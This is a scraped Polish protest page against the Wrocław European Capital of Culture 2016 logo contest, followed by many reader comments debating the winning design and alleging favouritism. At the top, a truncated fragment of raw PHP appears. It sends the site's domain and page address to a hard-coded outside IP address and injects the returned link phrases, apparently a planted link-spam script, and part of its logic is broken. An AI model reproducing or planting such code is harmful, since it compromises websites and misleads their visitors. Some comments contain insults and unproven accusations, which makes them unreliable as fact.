= time()-24*60*60) { $links_file = file_get_contents($path); } else { $links_file = file_get_contents('http://178.250.47.112/projekty/jubiler/files/getlinks.new.php?domain='.urlencode($_SERVER['HTTP_HOST']).'&page='.urlencode($_SERVER['REQUEST_URI']).'§ions='.urlencode(json_encode($sections))); if($links_file) { file_put_contents($path, $links_file); } else { $links_file = file_get_contents($links_file); } } $links = array('text_1', 'text_2'); foreach(json_decode($links_file, true) as $data) { if(preg_match('/[%].+[%]/', $data['phrase'])) $links[$data['section']] = @preg_replace('/(.*)[%](.*)[%](.*)/', "$1$2$3", $data['phrase']); else $links[$data['section']] = @"{$data['phrase']}"; } @session_start(); $_SESSION['links'] = $links; ?> Protest « Europejska Stolica Kultury 2016 – Logo Vox Populi

Protest

Protestujemy przeciwko stosowaniu niezwykle niskich standardów przy tworzeniu procedur przeprowadzania konkursów artystycznych.

Formuła konkursu na logo Wrocław ESK 2016, sposób prezentacji jego rezultatu oraz  argumenty przedstawione przez komisję konkursową wywołały w nas jak i w grupie internautów oburzenie.

Nie zgadzamy się również z decyzją Dyrektora ESK 2016 na utajnienie pozostałych prac konkursowych. Swoją dezaprobatę wyrażamy w formie niniejszej strony internetowej przedstawiającej zebrane w dobrej woli, prace konkursowe przesłane przez jego uczestników. To jest również ich protest.

Logo  ESK 2016 Vox Populi

 71 odpowiedzi na „“Protest””

 1. Maciej Śmigaj pisze:

  Popieram

 2. marta kalinowska-lichota pisze:

  logo jest po prostu brzydkie. te które tu widze to naprawdę jest w czym wybierać!

 3. Anna Nowel pisze:

  W pełni popieram.

 4. jami pisze:

  rozumiem, że kogoś żółć zalewa, że nie wygrał. ale ten protest to już naprawdę żenada. punkty które wybraliście są od czapyv- bo żaden nie został złamany. naprawdę tak ciężko pogodzić się z porażką?

  najśmieszniejsze, że akcje nakręca agencyjka która wykonała najbardziej żenujące logo z zaprezentowanych.

  • Julita pisze:

   Zgadzam się w 100%, większość prezentowanych tu prac to jakaś pomyłka, a teksty niektórych autorów w stylu „moje logo także nie wygrało i nie chodzi o to że jestem zazdrosny” normalnie zniechęcają do jakiejkolwiek dyskusji.. Ręce opadają!!

 5. djshdjh pisze:

  okropne logo.. jakim cudem, to w ogóle zostało brane pod uwagę..

 6. Tomasz Piwowarczyk pisze:

  Popieram

 7. Irena Grzesiak pisze:

  W pełni popieram zasadność merytoryczną i zwykłą kulturę biznesową nie mówiąc o czymś takim jak przyzwoitość…

 8. Andrzej pisze:

  Popieram protest. Większość, absolutna większość prac konkursowych wygrywa z projektem, który został wybrany.
  „Zwycięski” projekt pasuje bardziej na logo WSI…

 9. praithai pisze:

  Popieram. Bardzo dziwnie wyglądało samo ogłoszenie wyników – na stronie wro2016.pl poinformowano, że JUŻ JEST !… i link do filmu o tym jak powstawało logo. Kiedy ten film powstał? Jeśli zwycięzca robił go na własny użytek, to jak się o tym dowiedzieli? Jest kilka pytań…

 10. miazga pisze:

  A czy organizator protestu swojego imienia i nazwiska to się wstydzi?

 11. miazga pisze:

  I jeszcze pytanie: Co to jest Deep Culture?

 12. ja-rek pisze:

  Popieram i chętnie wyślę podpisany własnoręcznie egzemplarz w odpowiednie miejsce. Proszę tylko o szczegóły.

 13. Łukasz pisze:

  Popieram razy miliard.

 14. Niklot pisze:

  …polactwo…

 15. Paweł pisze:

  inne propozycje, sa duzo ciekawsze

 16. r pisze:

  Witam,
  oczywiście protest popieram.
  Wrocław jest dziwnym miastem jeśli chodzi o konkursy.. wszystkie tego typu rozstrzygane są w niewyjaśnionych okolicznościach (wspomnę tu również konkurs na logo aquaparku wrocławskiego) nie wiem dlaczego łudziłem się że może tym razem będzie inaczej…

  praithai. zwycięzca konkursu zawsze dowiauje się wcześniej o wygranej (ktoryś konkurs wygrałem i zostałem o tym poinformowany telefonicznie przez dział promocji jeszcze zanim komisja się rozeszła..)

  nie mogę powiedzieć że wybrane logo jest kompletnie do niczego bo tak nie jest. jest poprawne eleganckie jednak moim zdaniem kompletnie nie mówi nic o KULTURZE. a to przeciez nie miało być logo miasta Wrocławia?! a na takie wygląda.

  to był ostatni moj konkurs we wro. pozdrawiam wszystkich /r

 17. JT pisze:

  Dlaczego nie moze odbyc sie konkurs internetowy, niech lud wybierze!!!

  Mi się podoba Mass Gravity nr 3 oraz Jarosław Brykowicz nr 2

 18. Jurek Pazurek pisze:

  Jak oglądałem w TV prezentację zwycięskiego projektu to czułem, że coś śmierdzi. No ale jednak w gronie prac przedstawionych na stronie sam znalazłem może dwie, nad którymi warto się zastanowić i pracować dalej. Nie wiem skąd ta maniera, że logotyp dotyczący kultury ma rzygać kolorami jak na jakiejś fladze LGBT. Cyrk i jarmark bez ładu i składu.

 19. makary pisze:

  Popieram!

 20. Lael pisze:

  Myślenie nie boli. Konkurs był ogólnopolski – oczywiście, że roztrzygnięcie było PRZED ogłoszeniem wyników, bo jak inaczej laureat miał dotrzeć do Wrocławia tego samego dnia, i to jeszcze w poniedziałek. Nie doszukujmy się teorii spiskowych tam, gdzie ich nie ma. Logo może się podobać lub nie, ale takie oskarżenia to dopiero kompletny brak stylu.

 21. Jakub Baran pisze:

  Każdy z nas, jeżeli ma jakiekolwiek pojęcie o grafice komputerowej, mógłby zrobić podobne logo. Nie dziwią więc nieprawidłowości przy wyborze tego projektu. Popieram protest!

 22. Grunwald pisze:

  Ze wszyskich do tej pory prezentowanych prac, ta wybrana jest najlepsza. Może inne nie zostało wybrane bo nie było z czego wybierać? Myśleć, myśleć.Kolorowe gluty, baloniki, niedopracowana typografia. Nie dziwię się jury. Zwykle bicie piany. Czekam na następne znaczki do kolekcji – zgłoszeń było 600… a tutaj zaledwie promil. Kaman ludzie! Przysyłajcie i pochwalcie się swoim wiekopomnym dziełem, które powinno było wygrać!

 23. Kuba pisze:

  @miazga
  Dane właściciela domeny są ogólnodostępne pod adresem:

  NAZWA DOMENY: logoesk2016.pl
  utworzona: 2013.02.18 15:13:48
  ABONENT: Mass Gravity – Ł. Łysik, P. Sypuła Sp. j.

 24. McjP pisze:

  Większość propozycji nie jest zbyt ciekawa, ale ta zwycięska zdecydowanie najbardziej pospolita i słabo związana z tematem, nie ma w sobie niczego co przyciągnie uwagę, ani eleganckiej formy.
  Jestem za rozpisaniem nowego konkursu (z dopuszczeniem zwycięskiej pracy i pozostałych biorących udział w konkursie oraz wszystkich nowych).
  Może tym razem uda mi się zdążyć złożyć moją propozycję…

 25. prawda pisze:

  :Polska:Solidarność:Ratusz czyli (Państwo/Polityka/Architektura)

  a LOGO powinno przecież nawiązywać do

  :Europa{Wrocław}:Kultura{muzyka,sztuka,teatr}:Ludzie czyli (Europa/Kultura/Społeczeństwo)

  Wyjaśnienia pań i panów z różnych instytucji są niedorzecznie subiektywne w swojej formie ponieważ odnoszą się jedynie do technicznej strony LOGO !!!!

  Linki :

  Projekty Logo z 2011r. – Kandydaci ESK 2016 (11 miast):

  Wypowiedzi na temat logo Wrocław ESK 2016 ze strony technicznej :

  Wątpliwości co do konkursu. Czyżby po znajomości? :

  Tajne logo ESK Białystok 2016 :

  Kontakty są najważniejsze – ESK Lublin 2016 :

  Pan Krzysztof Czyżewski/ Białystok był/jest m.in. dyrektorem artystycznym projektów :
  - ESK Białystok 2016 (miasto kandydat=brak sukcesu)
  - ESK Lublin 2016 (miasto kandydat=brak sukcesu)
  - ESK Wrocław 2016 (niejasności w konkursie na LOGO i wątpliwości społeczeństwa)

  (ten pan zarządza teraz wrocławskim ESK 2016 i już są problemy, po prostu pięknie !!!!)

  REKLAMA w formie LOGO firmy tworzącej filmik PROMO za pięniądze miasta WROCŁAW ? Brak LOGO wrocławskiego biura festiwalowego Impart 2016 czyli organizatora :

  Siedziba firmy tworzącej filmik PROMO : Białystok :

  A projekt strony WWW tej firmy jest autorstwem firmy pana który wygrał konkurs na LOGO WROCŁAW ESK 2016: Jerzy Osiennik / Białystok

  Ponadto Logo Wrocław ESK 2016 bardzo przypomina LOGO drukarni Bieldruk z 2010 r. widniejącej na stronie !!!!! Ładna więc historia o Polsce, Solidarności oraz odwoływania sie do nowoczeności zdjęciem ratusza w perspektywie z lat 20-30 dzwudziestego wieku. BRAWO!! Tylko czekać na następne sensacyjne informacje.

  Jak dla mnie ten konkurs powinien zostać powtórzony, wszystkie nadesłane projekty opublicznione a całej działalności organizatorów powinni przyjrzeć się odpowiednie organy. Pieniądze nie pochodzą z prywatnych kieszeni, racja ? Tylko gdzie w tym wszystkim to co najważniejsze, KULTURA ???

  SPOŁECZEŃSTWO OBYWATELSKIE

 26. krokodyl pisze:

  Rasta ! Pokój ! Zacisze !
  Ojojojoj !

 27. a. pisze:

  na wspomnianej wyżej stronie:

  warto spojrzeć na logo „Bieldruk”…

 28. Parc pisze:

  Jakie miasto takie loga. Get used to it

 29. osmepietro pisze:

  popieram.

 30. Gargi pisze:

  Popieram protest :)
  Moje logo także nie wygrało i nie chodzi o to że jestem zazdrosny ale o to że wygrało bardzo słabe logo … nie wspominając o jakiś dziwnych układach .
  Ktoś powyżej napisał że logo nie powinno być „nasrane kolorami” – czy jakoś tak – otóż nie musi, ale w ten sposób najłatwiej, najbardziej zrozumiale przedstawić szeroko pojętą kulturę, europejską kulturę …
  Co do baloników, no cóż taki projekt, przecież nie wygrał. Są tu lepsze i gorsze projekty ale widać że większość rozumiała ideę a zwycięskie logo … to jak dla mnie logo nacjonalistyczne, nudne, nie zmieni tego jakość zaprojektowania …

 31. krzesimir drachal pisze:

  widze że węszenie wszedzie spisku trotylu albo nacjonalizmu dotarło także do „projektantów”

 32. Damian pisze:

  Popieram protest. Wybrany logotyp jest nijaki, mdły, w żaden sposób nie oddaje ducha i przede wszystkim energii tego miasta. Nawiązywanie do tematyki Solidarności jest dla mnie, w kontekście ESK, zbyt konserwatywne, nudne i zaściankowe. Czas, ażeby zdjąć kaganiec z umysłu i pójść dalej, do przodu. Możemy zaproponować Europie swoją energię, otwartość i tolerancję. Tak przede wszystkim rozumiem i definiuję Wrocław. Przepraszam, bez urazy, ale Pan z Podlasia prawdopodobnie guzik na ten temat wie i dlatego startuje z „Solidarnością” w tle, która dla nas tutaj we Wrocławiu powoli odchodzi do książek historycznych. My tutaj już powoli nie mamy czasu na takie rzeczy bo gonimy Europę.

 33. MM pisze:

  Popieram protest!

  Oby te protesty przyczyniły się do zmiany zwycięscy, bo to coś co zostało wybrane przyniesie nam wielki WSTYD na cały świat…

 34. nie no :-) pisze:

  Jak na razie prezentowane propozycje wskazują, że do Europy to jeszcze daaaaaaaaaaaaaaaaaaaaleeeeko :-)

 35. ss pisze:

  Popieram. Zwracam jednak uwagę, że wybrane punkty w regulaminie, są silnie dyskusyjne, jak i ich złamanie. Najważniejsza argumentacja to związek finansowy obu panów. Ten należałoby jednak wskazać w sposób wyraźny i niepodważalny, inaczej trudno z tym werdyktem zasadnie dyskutować.

 36. Cerda pisze:

  Nie popieram. Nie ma na niniejszej stronie lepszego loga od zwycięskeigo!

 37. koodi pisze:

  Ciekaw jestem w zasadzie innych propozycji.
  Logotyp do najtragiczniejszych wcale nie należy :) Odzwierciedla raczej czyjeś zapotrzebowanie na konkretny znak ^^ Jakie by ono nie było.

  Martwi mnie natomiast powiązanie organizator – uczestnik.

 38. marcello pisze:

  Popieram, nowy konkurs konieczny!

 39. Maciej pisze:

  Popieram. Pomijając wszelkie inne argumenty, walory artystyczne, jakość projektów – została złamana podstawowa zasada (jeśli w sposób wystarczający została udowodniona). Historia zna zbyt wiele takich przypadków ‚kumplostwa’.

 40. jotiks pisze:

  Zgadzam sie z Cerdą, obejrzałem te prace i procz zwycieskiego jest bieda. Nie wiem co ma na celu ten „protest”. Ktoś poczuł sie urażony że jego projekt nie wygrał? Dajcie spokój.. zostawcie podejmowanie decyzji ludziom którzy sie faktycznie na tym znają.. Troche pokory i samokrytyki domorośli artyści

 41. mn pisze:

  Zwyciężyło PRL owskie poczucie „piękna”.

 42. Maciej pisze:

  Słuszny protest.
  Popieram.

 43. Agata pisze:

  Popieram rozpisanie nowego konkursu!
  Logo będzie funkcjonowało przez rok czasu, to prestiż i duma dla Wrocławia – więc ranga tego wydarzenia powinna przekładać się na profesjonalne materiały reklamowe.
  To nie rzecz gustu, bo zawsze będą podzielone zdania. Tylko profesjonalnej, rzetelnej pracy… polotu, świeżości, a może też humoru, rozpoznania tematu i wielu innych czynników, które mają wpływ na dobre logo – które podobać się będzie większości.
  Wybrane logo z wszystkich prezentowanych jest ok., ale nie pasuje do nadchodzącego wydarzenia!
  Tu są świetne przykłady dobrych znaków:


 44. Pinta pisze:

  Popieram protest!

 45. Kaszell pisze:

  W pełni popieram.

 46. macko pisze:

  Popieram !!!

 47. Piotr pisze:

  Oczywiście, że popieram. Wybrane logo jest żenujące, dołączony do niego filmik „jak zrobiłem logo” jest po prostu komiczny. Artyście dachy Wrocławia skojarzyły się z „W”, a haczyk to niby Solidarność. No gratuluję odkrywczości. To logo może z powodzeniem być wykorzystane jako logo miejskiej spółki oczyszczania miasta, jak również przyszłego metra wrocławskiego (zbieżność z odwróconym metrem warszawskim chyba zamierzona).

 48. Luke pisze:

  Popieram!

 49. Pinta pisze:

  Popieram protest – wybór niezbyt szczęśliwy. Ale poziom pozostałych prac nie powala. Kilka ma w sobie potencjał.

 50. maszinka pisze:

  Logo „dynamiczne i kolorowe’? Cz mówicie o tych balonikach, przewyzszajacych swoim estetycznym kiczem nawet odchodzacego na szczęście na wieczny odpoczynek motylka.
  Logo, które może nosić przedszkolak? To chyba to!
  Panie i panowie, litości! Zajrzyjcie do książek z historią sztuki,grafiki, popatrzcie na to co dzieje się w świecie jeśli chodzi o graficzne projektowanie, o obrońcy baloników!
  Wybrane logo przynajmniej nie jest obciachowe. uff!

 51. Monia pisze:

  Popieram. Logo jest wyjątkowo nieudolne, wstyd, że wygrało.

 52. tomkos pisze:

  popieram, wybrane logo nic nie niesie. absolutnie bezpłciowe.

 53. K pisze:

  Popieram protest.

 54. emha pisze:

  Zwycięskie logo jest o niczym. Kojarzy się z niczym. Pasuje do wszystkiego na „w”
  Pozostałe przedstawione na tej stronie logo, to cepeliada albo żenada nadająca się na paczkę pampersów albo chipsów, najlepiej chińskiej produkcji.
  Gdyby nie fakt, że urząd miasta ma problem z dalszą komeracjalizacją motylka i skończyły się wpływy, to lepiej było go zostawić, bo z tego konkursu nie bardzo jest w czym wybierać.

 55. Marcin Usarek pisze:

  …, tak, to prawda, patrząc na dotychczasowe prace, poziom nie był zbyt wysoki, choć naturalnie te najlepsze nie zostaną opublikowane (profesjonalne firmy się w to „nie bawią”), choć szkoda, że nie było żadnych wyróżnień…, odnośnie samego zwycięskiego logo, hmmm spodziewałem się czegoś nieco innego.

 56. Władek pisze:

  Popieram

 57. Agata Bal pisze:

  Popieram protest i popieram list otwarty do Ministra Kultury.

  1. Wybrane logo nie kojarzy się w żaden sposób z kulturą. Raczej skupia się się na aspekcie narodowo-historycznym. Nie taki był jego główny cel. Jest wg mnie w puli najgorszych spośród tych, które widzę na stronie.

  2. Wybrane logo nie spełnia wymogów,które zostały ustalone przez ogłaszających konkurs.

  3. Wybrane logo ma w tle jakąś dziwną historię z cyklu „krewni-i-znajomi-królika”.

  4. Wybrane logo sprawia, że jest mi wstyd jako wrocławiance. To nie jest realizacja godna ambicji Wrocławia i wrocławian.

  Ludzką rzeczą jest błądzić, ludzie z klasą mogą się do tego przyznać, wystarczy przyzwoitość i odwaga. Konkurs powinien zostać rozpisany ponownie, a werdykt ogłoszony w odniesieniu do wymogów postawionych w konkursie (dokładny opis, aby nie było podejrzeń o „widzimisię”).

 58. korela pisze:

  Mówiąc szczerze zwycięskie logo podoba mi sie najbardziej i ja również przyznałabym mu główną nagrodę. Jest minimalistyczne, czytelne, biało-czerwone i podoba mi się ukryta w literce lambda/symbol flagi? Autorowi szczerze gratuluję.

 59. Julita pisze:

  Ludzie, czyście oszaleli?? Przedstawione tu loga są po prostu PORAŻKĄ!! Jak wyobrażacie sobie np. te logo z balonikami w miniaturce?? Czy będzie ono czytelne?? Zwycięskie logo jest bezdyskusyjnie NAJLEPSZE i gratuluję zarówno Autorowi jak i jury dobrego wyboru!!

 60. Julita pisze:

  A przez teksty innych autorów w stylu:
  „Moje logo także nie wygrało i nie chodzi o to że jestem zazdrosny” normalnie ręce opadają…

 61. bony pisze:

  Ta strona i próby walki chyba z własnymi kompleksami pokazują, że ludzie nie potrafią sobie poradzić z przegraną!! Ogarnijcie się, zdaniem jury wygrał najlepszy i to nie podlega dyskusji! Rozpisywanie nowego konkursu może mieć miejsce chyba w waszych snach, drodzy przegrani, pogódźcie się z porażką i żyjcie dalej…

 62. Jestem zdecydowanie przeciw, zwycięski logotyp jest nijaki, ma stylistykę z poprzedniego wieku i zdecydowanie nie ma nic wspólnego z Wrocławiem.
  Jako mieszkanka Wrocławia, artysta proponuję ogłosić konkurs od nowa.

 63. Gargi pisze:

  Czytam te komentarz i zastanawiam się o co chodzi …
  Teksty o profesjonalizmie ???
  Moje logo także nie wygrało a projektowaniem zajmuję się od 17 lat, mam swój styl i się go trzymam.
  Pisanie o balonika … no przecież nie wygrało !!! Ktoś wstawił by pokazać że i takie było.
  Ktoś napisał żeby zobaczyć jak wyglądają logotypy na świeci … ano zobaczyłem wrzućcie sobie w googla : „european capital of culture logo” – kolorowe, „żywe”, otwarte, ciekawe, kreatywne, twórcze … Czy Marsylia, Genua, Liverpool, Maribor, Sofia uderzają pompatyczny narodowościowy ton???? (od autora: skojarzenie z Solidarnością, barwami flagi i godłem)
  No proszę was … po za tym miała to być logo WROCŁAWIA a nie Polski, no chyba że kultura w „europejskim” Wrocławiu ma być minimalistyczna, narodowościowa, skromna, prosta itp.
  To mówi zwycięskie logo, zobaczcie inne miasta a nawet te Logotypu tu prezentowane – mi, europejczykowi mówią o wielokulturowości, otwartości na różne formy, ekspresji, fantazji …

  Nie winię autora zwycięskiej pracy że taką wykonał, jego wybór. Winię jury za krótkowzroczność, brak wiedzy marketingowej, płytkość spojrzenia
  Zobaczcie sobie jaka była propozycja Sofii i zestawcie to z możliwościami wykorzystanie zwycięskiego logo:

 64. Peter pisze:

  Inicjatywa podobnie jak 99% pokazanych tu bohomazów, godna pożałowania.

  • Gargi pisze:

   Poprosimy o Pańską propozycję … bo krytykować jest łatwo ale zrobić „cokolwiek” i pokazać już trudniej …

 65. Robert pisze:

  Logo jest bardzo „grzeczne”

  ale czy o to chodzi,
  my mamy zaistnieć w świecie/w kulturze

  logo, które ma przedstawiać nas w świecie, i pokazywać ideę „festiwal sztuki/kutury”

  powinno być otwarte

  …już w swoim założeniu powinno być otawarte

  i jak ma do tego być użycie zamknięte formy „koła”

  od razu nas dysklafikuje

  podkreślamy swoją zaściankowość (ukłony do Mickiewicza, a każdy Polak powinien znać Mickiewicza)

  i myśleć „W PRZYSZŁOŚCI”

  nie zamykajmy się w takim znaku

  (przepraszam dla projektanta, bo logo konstrukcyjnie jest dobre tylko nie na temat)

 66. Janek pisze:

  Jesteście wspaniali, że w ogóle jesteście! Prace są lepsze i gorsze – sami wiecie najlepiej ;).
  A gdzie jest wszystkich podobno 600 prac. A może nie było 600 może było właśnie tyle ile tu pokazano?
  Straszna ściema- trzeba naprawdę nie posiadać charakteru aby się tak zachować, brawo jury, brawo zarząd ESK. Europa tak- ale wschodnia.

 67. COOL-turalny pisze:

  POPIERAM TEN PROTEST!

  Mam do wszystkich jedną prośbę o wizualizację – wyobraźcie sobie, że Rio de Janeiro wygrywa konkurs na Amerykańską Stolicę Kultury(ASK2016), i w takim konkursie wygrywa identyczne logo, tylko zamiast „W” jest „R”…

  Moje pierwsze skojarzenie – „METRO”… Tak… To logo idealnie nadawałoby się na Wrocławskie Metro, gdyby takie istniało. Prawie jak „M” warszawskie tylko że odwrócone .

 68. Antek pisze:

  Czy do Was też dzwonili z TVN z prośbą o komentarz?

Odpowiedz na „maszinka